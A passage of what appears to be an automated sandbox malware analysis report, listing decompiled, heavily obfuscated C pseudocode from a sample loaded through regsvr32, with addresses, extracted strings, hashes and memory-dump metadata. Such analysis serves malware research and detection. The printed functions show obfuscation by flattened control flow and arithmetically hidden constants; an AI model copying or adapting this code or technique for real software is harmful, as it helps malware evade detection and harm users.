					_v8 = _v8 ^ 0xfb3f2999;
					_t155 = E04F7C6D9(_v12, _v8,  &_v284);
					_t184 = _t155;
					if(_t155 != 0) {
						goto L8;
					}
					return _t155;
				}
				goto L6;
			}

0x04f75694
0x04f75696
0x04f7569d
0x04f756ad
0x04f756ad
0x04f756b1
0x00000000
0x00000000
0x04f756a7
0x04f756b5
0x04f756a9
0x04f756a9
0x04f756ab
0x04f756ac
0x00000000
0x04f756ac
0x04f756b8
0x04f756b8
0x04f756c1
0x04f756cd
0x04f756d2
0x04f756da
0x04f756dd
0x04f756e0
0x04f756e7
0x04f756ee
0x04f756f5
0x04f75700
0x04f75709
0x04f75717
0x04f7571c
0x04f75721
0x04f75778
0x04f75778
0x04f75781
0x04f7578d
0x04f75792
0x04f75797
0x04f7579e
0x04f757a5
0x04f757ac
0x04f757b3
0x04f757b7
0x04f757be
0x04f757c5
0x04f757d0
0x04f757d1
0x04f757d4
0x04f757db
0x04f757e2
0x04f757e6
0x04f757ed
0x04f757f4
0x04f757fb
0x04f75802
0x04f75807
0x04f7580a
0x04f75811
0x04f7582a
0x04f7582f
0x04f7583f
0x04f7584a
0x04f75851
0x04f75852
0x04f75855
0x04f7585c
0x04f75863
0x04f7586a
0x04f75871
0x04f75878
0x04f7587c
0x04f75883
0x04f7588a
0x04f7588e
0x04f75895
0x04f7589c
0x04f758a3
0x04f758a6
0x04f758a9
0x00000000
0x04f758b4
0x04f75723
0x04f75730
0x04f75737
0x04f7573e
0x04f75745
0x04f7574c
0x04f75753
0x04f7575a
0x04f75768
0x04f7576d
0x04f75772
0x00000000
0x00000000
0x04f758bc
0x04f758bc
0x00000000

Strings

/, xrefs: 04F75781
ehA, xrefs: 04F75871
Nw, xrefs: 04F75723
, xrefs: 04F75730
y_, xrefs: 04F75802

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /$Nw$ehA$y_$
API String ID: 0-4228760529
Opcode ID: 67a8cb5e476ff8adce31ee24747333a907158ecb9483e6ad1d32c9d084ab0127
Instruction ID: fbe4d09aba98188d3b2dbcab2604a3e720cbf4bccf3b8321c6dcf93291fd66db
Opcode Fuzzy Hash: 67a8cb5e476ff8adce31ee24747333a907158ecb9483e6ad1d32c9d084ab0127
Instruction Fuzzy Hash: 3461F176D01209EBDB58CFE5DA4A5DEBBB1AF45318F20809AD011BB250D7B81B4ADF90

Uniqueness

Uniqueness Score: -1.00%

Function 04F72FB9 Relevance: 6.4, Strings: 5, Instructions: 119
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04F72FB9() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t100;
				intOrPtr _t101;
				intOrPtr _t105;
				signed int _t114;
				signed int* _t126;

				_t126 =  &_v40;
				_v4 = _v4 & 0x00000000;
				_t114 =  *0x4f82b10; // 0x0
				_v16 = 0x68812;
				_v12 = 0x1fd6b;
				_t100 = 0xbd18d;
				_v8 = 0x3acb1;
				do {
					while(_t100 != 0x65e16) {
						if(_t100 == 0xa7234) {
							_v28 = 0x2d6936;
							_v28 = _v28 << 0xb;
							_v28 = _v28 ^ 0x6b422712;
							_v36 = 0x142045;
							_v36 = _v36 * 0x7e;
							_v36 = _v36 | 0xccabe9dc;
							_v36 = _v36 ^ 0xcde2ca88;
							_v32 = 0x38b5b7;
							_v32 = _v32 ^ 0x8fedff0e;
							_v32 = _v32 ^ 0x8fdec0b6;
							_v40 = 0xd6a307;
							_v40 = _v40 + 0xffff9267;
							_v40 = _v40 >> 5;
							_v40 = _v40 | 0x7ed11298;
							_v40 = _v40 ^ 0x7ede4502;
							_t105 = E04F7E064(_t114, _t116, _t114, _v28, _t114, _v36, _v32, _v40);
							_t114 =  *0x4f82b10; // 0x0
							_t126 =  &(_t126[6]);
							 *((intOrPtr*)(_t114 + 0x14)) = _t105;
							_t100 = 0x65e16;
							continue;
						} else {
							_t130 = _t100 - 0xbd18d;
							if(_t100 == 0xbd18d) {
								_v40 = 0xbe25bf;
								_v40 = _v40 << 0xc;
								_v40 = _v40 << 4;
								_push(_t114);
								_t116 = 0x24;
								_v40 = _v40 * 0x73;
								_v40 = _v40 ^ 0xf4cc9c6e;
								_v36 = 0xd1b1cf;
								_v36 = _v36 * 0x62;
								_v36 = _v36 ^ 0x7a2ea99f;
								_v36 = _v36 ^ 0x2a6dae69;
								_t114 = E04F73EE6(_t114, _t116, _t130);
								_t100 = 0xa7234;
								 *0x4f82b10 = _t114;
								continue;
							}
						}
						goto L7;
					}
					_v20 = 0xe1e5c5;
					_v20 = _v20 + 0x8824;
					_v20 = _v20 ^ 0x00ec3a5e;
					_v24 = 0xc4c32f;
					_v24 = _v24 + 0x5348;
					_v24 = _v24 ^ 0x00c753a3;
					_v40 = 0xb39f30;
					_v40 = _v40 + 0x27bf;
					_v40 = _v40 ^ 0x7e527750;
					_v40 = _v40 ^ 0x9de86059;
					_v40 = _v40 ^ 0xe30ebc16;
					_v32 = 0xdfde93;
					_v32 = _v32 >> 7;
					_v32 = _v32 ^ 0x000e53b8;
					_v36 = 0xc626e;
					_v36 = _v36 ^ 0x24de2d6d;
					_v36 = _v36 ^ 0xba4f1eb8;
					_v36 = _v36 ^ 0x9e9b479f;
					_v28 = 0x2494db;
					_v28 = _v28 >> 5;
					_t89 =  &_v28;
					 *_t89 = _v28 ^ 0x000136eb;
					__eflags =  *_t89;
					_t116 = _v20;
					_t101 = E04F7C75F(_t114, _v20, _v24, _v40, _v32, _t114, E04F642B2, _t114, _v36, _t114, _v28, 0);
					_t114 =  *0x4f82b10; // 0x0
					_t126 =  &(_t126[0xa]);
					 *((intOrPtr*)(_t114 + 4)) = _t101;
					_t100 = 0xea7f2;
					L7:
					__eflags = _t100 - 0xea7f2;
				} while (__eflags != 0);
				__eflags = _t114;
				_t99 = _t114 != 0;
				__eflags = _t99;
				return 0 | _t99;
			}

0x04f72fb9
0x04f72fbc
0x04f72fc1
0x04f72fca
0x04f72fd8
0x04f72fe0
0x04f72fe2
0x04f72ff9
0x04f72ff9
0x04f73003
0x04f7306f
0x04f73077
0x04f7307c
0x04f73084
0x04f73091
0x04f73095
0x04f7309d
0x04f730a5
0x04f730ad
0x04f730b5
0x04f730bd
0x04f730c5
0x04f730cd
0x04f730d2
0x04f730da
0x04f730f4
0x04f730f9
0x04f730ff
0x04f73102
0x04f73105
0x00000000
0x04f73005
0x04f73005
0x04f73007
0x04f7300d
0x04f73015
0x04f7301a
0x04f73024
0x04f73027
0x04f73028
0x04f7302c
0x04f73034
0x04f73041
0x04f73045
0x04f7304d
0x04f73063
0x04f73065
0x04f73067
0x00000000
0x04f73067
0x04f73007
0x00000000
0x04f73003
0x04f7310c
0x04f73114
0x04f7311c
0x04f73124
0x04f7312c
0x04f73134
0x04f7313c
0x04f73144
0x04f7314c
0x04f73154
0x04f7315c
0x04f73164
0x04f7316c
0x04f73171
0x04f73179
0x04f73181
0x04f73189
0x04f73191
0x04f73199
0x04f731a1
0x04f731a6
0x04f731a6
0x04f731a6
0x04f731cc
0x04f731d0
0x04f731d5
0x04f731db
0x04f731de
0x04f731e1
0x04f731e3
0x04f731e3
0x04f731e3
0x04f731ee
0x04f731f2
0x04f731f2
0x04f731f9

Strings

6i-, xrefs: 04F7306F
PwR~, xrefs: 04F7314C
4r, xrefs: 04F72FEF
^:, xrefs: 04F7311C
HS, xrefs: 04F7312C

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4r$6i-$HS$PwR~$^:
API String ID: 0-2546863639
Opcode ID: df60328558b96c5c9edddb3252df014d8b7ea3833a60799f1367df79f300af3d
Instruction ID: ffa3c963fd7d3dffc22eea6d671d56b4e226baf43ff32551e15a426e77f5dc60
Opcode Fuzzy Hash: df60328558b96c5c9edddb3252df014d8b7ea3833a60799f1367df79f300af3d
Instruction Fuzzy Hash: 355123712093429FC358CF25E94A91BBBE0BB84748F104E1DF1A5A6221D3B9DA49CF97

Uniqueness

Uniqueness Score: -1.00%

Function 10020E85 Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10020E85(void* __ecx) {
				signed int _t5;
				void* _t15;
				void* _t19;

				_t15 = __ecx;
				if((E100229FB(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E100209E9(_t15);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E10006E47();
				if(_t19 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x1c), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x10020e88
0x10020e94
0x10020edc
0x10020ede
0x10020ee5
0x00000000
0x10020ee7
0x10020e9b
0x10020e9f
0x00000000
0x10020ec2
0x10020ed1
0x00000000
0x10020ed9

APIs

Part of subcall function 100229FB: GetWindowLongA.USER32 ref: 10022A06

GetKeyState.USER32 ref: 10020EA9
GetKeyState.USER32 ref: 10020EB2
GetKeyState.USER32 ref: 10020EBB
SendMessageA.USER32 ref: 10020ED1

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: d29282d662411b5af618882cce8efd776785956748525f7b0cfa37e9851764a6
Instruction ID: bd9e3f9934d99040cc27c92473149591056999e02df00b6ccec2108507d898b5
Opcode Fuzzy Hash: d29282d662411b5af618882cce8efd776785956748525f7b0cfa37e9851764a6
Instruction Fuzzy Hash: B8F0E93A78039F2DEE10F675AC42FAA045ACF44BD0F930935F641FA4D3C950D8425170

Uniqueness

Uniqueness Score: -1.00%

Function 04F78FB0 Relevance: 5.5, Strings: 4, Instructions: 480
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04F78FB0(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _t501;
				signed int _t506;
				void* _t522;
				void* _t560;
				void* _t562;
				signed int _t563;
				signed int _t566;
				signed int _t572;
				signed int _t576;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t585;
				signed int _t586;
				signed int _t592;
				signed int _t593;
				void* _t596;
				signed int _t638;
				signed int* _t644;

				_t644 =  &_v1604;
				_v1584 = 0xecf95;
				_t560 = __ecx;
				_v1584 = _v1584 & 0x00000000;
				_t501 = 0x8f429;
				_t638 = _v1584;
				while(1) {
					L1:
					_t562 = 0xbadf3;
					while(1) {
						L2:
						_t596 = 0x225c7;
						do {
							L3:
							while(_t501 != _t596) {
								if(_t501 == 0x23f23) {
									_v1596 = 0xc352aa;
									_v1596 = _v1596 + 0xffff66a3;
									_v1596 = _v1596 ^ 0x00c33d29;
									_v1600 = 0x5e7b38;
									_v1600 = _v1600 >> 3;
									_push(_t562);
									_v1600 = _v1600 * 0x32;
									_v1600 = _v1600 >> 5;
									_v1600 = _v1600 ^ 0x00189940;
									E04F75B9E(_v1596,  &_v1044, __eflags, _v1600);
									_v1604 = 0xce83bc;
									_v1604 = _v1604 + 0xffffbfaf;
									_t566 = 0x1c;
									_v1604 = _v1604 / _t566;
									_v1604 = _v1604 ^ 0x00060516;
									_v1596 = 0x232b6a;
									_v1596 = _v1596 + 0xc3e9;
									_v1596 = _v1596 ^ 0x0025b60f;
									 *((short*)(E04F73E30(_v1604,  &_v1044, _v1596))) = 0;
									_v1600 = 0x331f79;
									_push(0x78);
									_v1600 = _v1600 / 0;
									_v1600 = _v1600 << 0xb;
									_v1600 = _v1600 | 0x7fe2b0ff;
									_v1600 = _v1600 ^ 0x7fe99fb0;
									_v1596 = 0x5f0ed;
									_v1596 = _v1596 << 9;
									_v1596 = _v1596 ^ 0x0be4213c;
									E04F619C8(_v1600, _v1596, __eflags,  &_v524);
									_v1600 = 0xd84f03;
									_v1600 = _v1600 + 0x5f99;
									_v1600 = _v1600 ^ 0x00dd1f8c;
									_v1592 = 0x8df186;
									_t572 = 0x18;
									_v1592 = _v1592 / _t572;
									_v1592 = _v1592 ^ 0x000dd6ed;
									_v1604 = 0x741573;
									_v1604 = _v1604 | 0x0f2a90ea;
									_v1604 = _v1604 >> 5;
									_v1604 = _v1604 ^ 0x0073a3f6;
									_v1596 = 0xf0926c;
									_v1596 = _v1596 * 0x1b;
									_v1596 = _v1596 ^ 0x195cf0a7;
									_t522 = E04F7D6A7(_v1600, _v1592, _v1604, 0x4f6184c, _v1596);
									_v1588 = 0x4582c0;
									_v1588 = _v1588 + 0xffffd8e5;
									_v1588 = _v1588 << 6;
									_v1588 = _v1588 << 0xd;
									_v1588 = _v1588 ^ 0xdd2fa989;
									_v1592 = 0xfdb3ce;
									_v1592 = _v1592 + 0xffff1783;
									_v1592 = _v1592 >> 1;
									_v1592 = _v1592 ^ 0x0076b81b;
									_v1604 = 0x53b88c;
									_v1604 = _v1604 | 0xb3da659f;
									_v1604 = _v1604 ^ 0x41054993;
									_v1604 = _v1604 ^ 0xf2d37981;
									_v1596 = 0x5fa0a5;
									_v1596 = _v1596 ^ 0x55c57cee;
									_v1596 = _v1596 ^ 0x55990583;
									_v1600 = 0xd246e9;
									_v1600 = _v1600 >> 6;
									_v1600 = _v1600 | 0x7c8e72d1;
									_v1600 = _v1600 * 0xe;
									_v1600 = _v1600 ^ 0xcfdf08eb;
									E04F736BB( &_v1044, __eflags, _v1600, _v1592,  &_v524, _v1604, _v1596, _t522, _v1600,  &_v1564);
									_v1592 = 0xff6594;
									_v1592 = _v1592 << 8;
									_v1592 = _v1592 | 0x39b02418;
									_v1592 = _v1592 ^ 0xfff8b3c0;
									_v1588 = 0xbb997c;
									_v1588 = _v1588 + 0x26a5;
									_v1588 = _v1588 >> 3;
									_v1588 = _v1588 | 0x05e9b1d2;
									_v1588 = _v1588 ^ 0x05ff9299;
									_v1604 = 0xd9aa9b;
									_v1604 = _v1604 | 0x94c11aae;
									_v1604 = _v1604 ^ 0xa2bed773;
									_v1604 = _v1604 ^ 0x366cbd9e;
									_v1600 = 0x92b132;
									_v1600 = _v1600 | 0x91b70bc8;
									_v1600 = _v1600 + 0xffffdcdc;
									_v1600 = _v1600 + 0x47b5;
									_v1600 = _v1600 ^ 0x91bb4120;
									E04F6845B(_v1592, _v1588, _v1604, _v1600, _t522);
									_v1600 = 0x98f2c5;
									_t644 =  &(_t644[0x11]);
									_v1600 = _v1600 | 0xabf30115;
									_v1600 = _v1600 + 0xfffff8ae;
									_t576 = 0x4f;
									_v1600 = _v1600 / _t576;
									_v1600 = _v1600 ^ 0x0229a895;
									_v1596 = 0x39ce1d;
									_v1596 = _v1596 >> 3;
									_v1596 = _v1596 ^ 0x00051dda;
									__eflags = E04F775AD(_v1600, _v1596,  &_v1564, _t560);
									if(__eflags != 0) {
										_t562 = 0xbadf3;
										__eflags = _t638 - 0xbadf3;
										_t596 = 0x225c7;
										_t501 =  ==  ? 0x225c7 : 0x3d1ad;
										continue;
									}
									_t501 = 0x70818;
									while(1) {
										L1:
										_t562 = 0xbadf3;
										L2:
										_t596 = 0x225c7;
										goto L3;
									}
								}
								if(_t501 == 0x3d1ad) {
									_v1604 = 0xaf636;
									_v1604 = _v1604 << 5;
									_t580 = 0x33;
									_v1604 = _v1604 / _t580;
									_v1604 = _v1604 ^ 0x513bcb63;
									_v1604 = _v1604 ^ 0x51311570;
									_v1592 = 0x54b958;
									_v1592 = _v1592 << 0xe;
									_v1592 = _v1592 | 0x30d8aa3f;
									_t581 = 0x38;
									_v1592 = _v1592 / _t581;
									_v1592 = _v1592 ^ 0x01143ebc;
									_v1588 = 0x86941e;
									_v1588 = _v1588 >> 4;
									_v1588 = _v1588 ^ 0xc95a5cfd;
									_t582 = 0x22;
									_v1588 = _v1588 / _t582;
									_v1588 = _v1588 ^ 0x05e0355a;
									_v1596 = 0xe925ce;
									_v1596 = _v1596 + 0xffff7026;
									_v1596 = _v1596 ^ 0x00e39ed7;
									_v1600 = 0x3c04b7;
									_v1600 = _v1600 | 0x69ce91e8;
									_v1600 = _v1600 + 0xffffee90;
									_t583 = 0x35;
									_v1600 = _v1600 / _t583;
									_v1600 = _v1600 ^ 0x01f4e56b;
									_t501 = E04F73B17(_v1604,  &_v1564, __eflags, _v1592, _t583, _v1588, 0, _v1596, 0,  &_v1580, _v1600);
									__eflags = _t501;
									if(_t501 != 0) {
										_v1592 = 0xf841b3;
										_t585 = 0x53;
										_v1592 = _v1592 / _t585;
										_v1592 = _v1592 << 3;
										_v1592 = _v1592 ^ 0x001481ba;
										_v1604 = 0x20e732;
										_t455 =  &_v1604; // 0x20e732
										_t586 = 0x15;
										_v1604 =  *_t455 / _t586;
										_v1604 = _v1604 | 0xebf5670d;
										_v1604 = _v1604 ^ 0xebf980cb;
										_v1596 = 0x21b953;
										_v1596 = _v1596 >> 0xf;
										_v1596 = _v1596 ^ 0x000c09bb;
										E04F68B6C(_v1592, _v1580, _v1604, _v1596);
										_v1592 = 0x39fa74;
										_v1592 = _v1592 << 2;
										_v1592 = _v1592 + 0xffff6f41;
										_v1592 = _v1592 | 0xa121fa11;
										_v1592 = _v1592 ^ 0xa1ecacb9;
										_v1604 = 0xd211e5;
										_v1604 = _v1604 >> 4;
										_v1604 = _v1604 + 0xffff9d84;
										_v1604 = _v1604 << 3;
										_v1604 = _v1604 ^ 0x006a96e6;
										_v1596 = 0xf9f155;
										_v1596 = _v1596 + 0xffff6cca;
										_t495 =  &_v1596;
										 *_t495 = _v1596 ^ 0x00ffd31b;
										__eflags =  *_t495;
										_t501 = E04F68B6C(_v1592, _v1576, _v1604, _v1596);
									}
									L27:
									return _t501;
								}
								if(_t501 == 0x6a3cc) {
									__eflags = _t638 - _t562;
									if(__eflags != 0) {
										_t501 = 0x23f23;
										continue;
									}
									_v1592 = 0x4a6ba5;
									_t593 = 0x47;
									_v1592 = _v1592 / _t593;
									_v1592 = _v1592 ^ 0x02010c55;
									_v1600 = 0x7326f2;
									_v1600 = _v1600 + 0xffff1991;
									_v1600 = _v1600 | 0x331d22fb;
									_v1600 = _v1600 + 0xffff14dc;
									_v1600 = _v1600 ^ 0x337d0caa;
									_v1596 = 0xda10eb;
									_v1596 = _v1596 + 0xffff4e67;
									_v1596 = _v1596 ^ 0x00d48a48;
									_v1588 = 0xedf79b;
									_v1588 = _v1588 + 0xb762;
									_v1588 = _v1588 >> 6;
									_v1588 = _v1588 * 0x42;
									_v1588 = _v1588 ^ 0x00f1aad4;
									_v1604 = 0x1cce5e;
									_v1604 = _v1604 << 8;
									_v1604 = _v1604 ^ 0x1ccd9e5e;
									_t501 = E04F7BF4C(_v1600, _v1596, _v1592, _v1588,  &_v1584, _v1604);
									_t644 =  &(_t644[6]);
									__eflags = _t501;
									if(__eflags == 0) {
										goto L27;
									}
									_t501 = 0x23f23;
									goto L1;
								}
								if(_t501 == 0x70818) {
									_v1604 = 0xf83018;
									_v1604 = _v1604 << 0xf;
									_v1604 = _v1604 * 0x7b;
									_v1604 = _v1604 ^ 0x8dc6e7f8;
									_v1592 = 0xae47fe;
									_v1592 = _v1592 + 0xffff28d6;
									_v1592 = _v1592 ^ 0x00a8a590;
									_v1596 = 0x672814;
									_v1596 = _v1596 << 6;
									_v1596 = _v1596 ^ 0x19ca1611;
									_t501 = E04F68B6C(_v1604, _v1584, _v1592, _v1596);
									goto L27;
								}
								if(_t501 == 0x8f429) {
									_t501 = 0x9080c;
									continue;
								}
								_t656 = _t501 - 0x9080c;
								if(_t501 != 0x9080c) {
									goto L22;
								}
								_v1588 = 0x2c234c;
								_v1588 = _v1588 | 0xfff2cef7;
								_v1588 = _v1588 + 0xffff22d5;
								_v1588 = _v1588 ^ 0xfff2be1e;
								_v1604 = 0x3894a1;
								_v1604 = _v1604 | 0x5a4a8392;
								_t592 = 0xd;
								_v1604 = _v1604 * 0x18;
								_v1604 = _v1604 ^ 0x7b721ecb;
								_v1592 = 0x791eec;
								_v1592 = _v1592 / _t592;
								_v1592 = _v1592 ^ 0x000de874;
								E04F7F42E();
								E04F74C70(_v1592 % _t592, _t656);
								_t562 = 0xbadf3;
								_t501 = 0x6a3cc;
								_t638 =  !=  ? 0xbadf3 : 0x87465;
								goto L2;
							}
							_v1596 = 0x85cb9f;
							_v1596 = _v1596 ^ 0x9b992304;
							_v1596 = _v1596 ^ 0x9b119276;
							_v1588 = 0x40dd0f;
							_v1588 = _v1588 | 0xb326f3e1;
							_v1588 = _v1588 >> 0xe;
							_v1588 = _v1588 ^ 0x00007276;
							_v1600 = 0x3a34f9;
							_v1600 = _v1600 + 0x6940;
							_v1600 = _v1600 | 0xb7bd141e;
							_v1600 = _v1600 >> 7;
							_v1600 = _v1600 ^ 0x016b6b9c;
							_v1592 = 0x77e93c;
							_v1592 = _v1592 + 0xffffc965;
							_v1592 = _v1592 | 0xd862c943;
							_v1592 = _v1592 ^ 0xd873cf6a;
							_v1604 = 0x129d15;
							_t563 = 0x6a;
							_v1604 = _v1604 / _t563;
							_v1604 = _v1604 >> 7;
							_v1604 = _v1604 ^ 0x0008a17b;
							_push(_v1604);
							_push(_t563);
							_t506 = E04F6260B(_v1596, _v1588, _v1600, _t563,  &_v1564, _v1584,  &_v1580, _v1592);
							_t644 =  &(_t644[8]);
							__eflags = _t506;
							if(_t506 != 0) {
								_v1600 = 0xd4240c;
								_v1600 = _v1600 >> 9;
								_v1600 = _v1600 >> 5;
								_v1600 = _v1600 ^ 0x21eb69d5;
								_v1600 = _v1600 ^ 0x21ef369d;
								_v1604 = 0xc1226a;
								_v1604 = _v1604 + 0x43f0;
								_v1604 = _v1604 + 0xd2e0;
								_v1604 = _v1604 ^ 0x00c05a93;
								_v1596 = 0xe6942d;
								_v1596 = _v1596 << 0xe;
								_v1596 = _v1596 ^ 0xa50b91ac;
								E04F68B6C(_v1600, _v1580, _v1604, _v1596);
								_v1592 = 0xbbf004;
								_v1592 = _v1592 | 0x89b587d9;
								_v1592 = _v1592 * 0x2d;
								_v1592 = _v1592 ^ 0x36b123b7;
								_v1596 = 0x74fa12;
								_v1596 = _v1596 + 0x9c4a;
								_v1596 = _v1596 ^ 0x00707843;
								_v1604 = 0x9dc8b1;
								_v1604 = _v1604 + 0x439b;
								_v1604 = _v1604 + 0xffffca17;
								_t352 =  &_v1604;
								 *_t352 = _v1604 ^ 0x009e6b48;
								__eflags =  *_t352;
								E04F68B6C(_v1592, _v1576, _v1596, _v1604);
								_t644 =  &(_t644[4]);
							}
							_t501 = 0x70818;
							_t562 = 0xbadf3;
							_t596 = 0x225c7;
							L22:
							__eflags = _t501 - 0xb989b;
						} while (__eflags != 0);
						goto L27;
					}
				}
			}

0x04f78fb0
0x04f78fb9
0x04f78fc1
0x04f78fc3
0x04f78fc8
0x04f78fce
0x04f78fd7
0x04f78fd7
0x04f78fd7
0x04f78fdc
0x04f78fdc
0x04f78fdc
0x04f78fe1
0x00000000
0x04f78fe1
0x04f78feb
0x04f7919c
0x04f791ab
0x04f791b3
0x04f791bb
0x04f791c3
0x04f791cd
0x04f791ce
0x04f791d2
0x04f791d7
0x04f791e7
0x04f791ec
0x04f791f6
0x04f79204
0x04f7920e
0x04f79212
0x04f7921a
0x04f79222
0x04f7922a
0x04f79246
0x04f79249
0x04f79255
0x04f7925a
0x04f79265
0x04f7926a
0x04f79272
0x04f7927a
0x04f79282
0x04f79287
0x04f79298
0x04f7929d
0x04f792a7
0x04f792af
0x04f792b7
0x04f792c6
0x04f792c9
0x04f792cd
0x04f792d5
0x04f792dd
0x04f792e5
0x04f792ea
0x04f792f2
0x04f792ff
0x04f79303
0x04f79320
0x04f79325
0x04f79330
0x04f7933a
0x04f79346
0x04f7934b
0x04f79353
0x04f7935b
0x04f79363
0x04f79367
0x04f7936f
0x04f79377
0x04f7937f
0x04f79387
0x04f7938f
0x04f79397
0x04f7939f
0x04f793a7
0x04f793af
0x04f793b4
0x04f793c1
0x04f793c9
0x04f793f0
0x04f793f5
0x04f793fd
0x04f79402
0x04f7940a
0x04f79412
0x04f7941a
0x04f79422
0x04f79427
0x04f7942f
0x04f79437
0x04f7943f
0x04f79447
0x04f7944f
0x04f79457
0x04f7945f
0x04f79467
0x04f7946f
0x04f79477
0x04f79490
0x04f79495
0x04f7949d
0x04f794a0
0x04f794aa
0x04f794b8
0x04f794bc
0x04f794c4
0x04f794cc
0x04f794d4
0x04f794d9
0x04f794f1
0x04f794f3
0x04f794ff
0x04f79509
0x04f7950b
0x04f79510
0x00000000
0x04f79510
0x04f794f5
0x04f78fd7
0x04f78fd7
0x04f78fd7
0x04f78fdc
0x04f78fdc
0x00000000
0x04f78fdc
0x04f78fd7
0x04f78ff6
0x04f7974d
0x04f79757
0x04f79762
0x04f79767
0x04f7976d
0x04f79775
0x04f7977d
0x04f79785
0x04f7978a
0x04f79796
0x04f7979b
0x04f797a1
0x04f797a9
0x04f797b1
0x04f797b6
0x04f797c2
0x04f797c7
0x04f797cd
0x04f797d5
0x04f797dd
0x04f797e5
0x04f797ed
0x04f797f5
0x04f797fd
0x04f79809
0x04f79810
0x04f79818
0x04f7983a
0x04f79842
0x04f79844
0x04f7984a
0x04f7985a
0x04f7985f
0x04f79865
0x04f7986a
0x04f79872
0x04f7987a
0x04f7987e
0x04f79881
0x04f79885
0x04f7988d
0x04f79895
0x04f7989d
0x04f798a2
0x04f798ba
0x04f798bf
0x04f798c7
0x04f798cc
0x04f798d4
0x04f798dc
0x04f798e4
0x04f798ec
0x04f798f1
0x04f798f9
0x04f798fe
0x04f79906
0x04f7990e
0x04f79916
0x04f79916
0x04f79916
0x04f7992e
0x04f79933
0x04f79936
0x04f79940
0x04f79940
0x04f79001
0x04f790c3
0x04f790c5
0x04f79195
0x00000000
0x04f79195
0x04f790cb
0x04f790db
0x04f790de
0x04f790e2
0x04f790ea
0x04f790f2
0x04f790fa
0x04f79102
0x04f7910a
0x04f79112
0x04f7911a
0x04f79122
0x04f7912a
0x04f79132
0x04f7913a
0x04f79144
0x04f7914c
0x04f79154
0x04f7915c
0x04f79161
0x04f7917e
0x04f79183
0x04f79186
0x04f79188
0x00000000
0x00000000
0x04f7918e
0x00000000
0x04f7918e
0x04f7900c
0x04f796e6
0x04f796ee
0x04f796f8
0x04f796fc
0x04f79704
0x04f7970c
0x04f79714
0x04f7971c
0x04f79724
0x04f79729
0x04f79741
0x00000000
0x04f79747
0x04f79017
0x04f790b9
0x00000000
0x04f790b9
0x04f7901d
0x04f79022
0x00000000
0x00000000
0x04f79028
0x04f79032
0x04f7903a
0x04f79042
0x04f7904a
0x04f79052
0x04f79061
0x04f79062
0x04f79066
0x04f7906e
0x04f7907c
0x04f79080
0x04f79094
0x04f7909b
0x04f790a7
0x04f790ac
0x04f790b1
0x00000000
0x04f790b1
0x04f79518
0x04f79522
0x04f7952a
0x04f79532
0x04f7953a
0x04f79542
0x04f79547
0x04f7954f
0x04f79557
0x04f7955f
0x04f79567
0x04f7956c
0x04f79574
0x04f7957c
0x04f79584
0x04f7958c
0x04f79594
0x04f795a2
0x04f795a5
0x04f795ad
0x04f795b2
0x04f795ba
0x04f795be
0x04f795da
0x04f795df
0x04f795e2
0x04f795e4
0x04f795ea
0x04f795f2
0x04f795f7
0x04f795fc
0x04f79604
0x04f7960c
0x04f79614
0x04f7961c
0x04f79624
0x04f7962c
0x04f79634
0x04f79639
0x04f79651
0x04f79656
0x04f7965e
0x04f7966b
0x04f7966f
0x04f79677
0x04f7967f
0x04f79687
0x04f7968f
0x04f79697
0x04f7969f
0x04f796a7
0x04f796a7
0x04f796a7
0x04f796bf
0x04f796c4
0x04f796c4
0x04f796c7
0x04f796cc
0x04f796d1
0x04f796d6
0x04f796d6
0x04f796d6
0x00000000
0x04f796e1
0x04f78fdc

Strings

2 , xrefs: 04F7987A
Cxp, xrefs: 04F79687
t, xrefs: 04F7908C
t, xrefs: 04F79076

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
